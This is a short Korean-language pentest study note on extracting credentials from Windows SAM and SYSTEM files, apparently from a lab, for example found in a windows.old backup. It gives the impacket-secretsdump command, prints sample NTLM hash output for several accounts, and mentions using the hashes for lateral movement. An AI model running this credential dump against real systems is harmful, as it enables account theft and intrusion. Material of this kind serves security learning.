SAM과 SYSTEM
윈도우의 system32 폴더 안에는 비밀번호, NTLM 해쉬 같은 크레덴셜 정보를 담고 있는 SAM, SYSTEM같은 파일들이 있다.
민감한 파일들이라 평소에는 보호받고 있어서 복붙도 불가능하다.
하지만 백업파일로 남아있는 경우 (windows.old 같은) 이 민감한 파일들을 이용해서 유저의 크레덴셜을 추출할 수가 있다.
SAM, SYSTEM 파일에서 정보 추출하기
kali에서 impacket-secretsdump라는 툴을 사용하기 위해 공격자 머신으로 두 파일을 옮길 필요가 있다.
파일들은 system32 폴더 안을 찾아보면 있다.
두 파일을 옮겼으면 다음의 명령어를 사용해서 크레덴셜을 추출한다.
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:acbb9b77c62fdd8fe5976148a933177a:::
tom_admin:1001:aad3b435b51404eeaad3b435b51404ee:4979d69d4ca66955c075c41cf45f24dc:::
Cheyanne.Adams:1002:aad3b435b51404eeaad3b435b51404ee:b3930e99899cb55b4aefef9a7021ffd0:::
David.Rhys:1003:aad3b435b51404eeaad3b435b51404ee:9ac088de348444c71dba2dca92127c11:::
Mark.Chetty:1004:aad3b435b51404eeaad3b435b51404ee:92903f280e5c5f3cab018bd91b94c771:::
그럼 위와 같이 유저명과 크레덴셜들이 출력되는데 가장 뒤에 있는 게 NTLM 해쉬다.
해쉬를 이용해서 다른 머신으로 래터럴무브먼트가 가능할지도 모른다.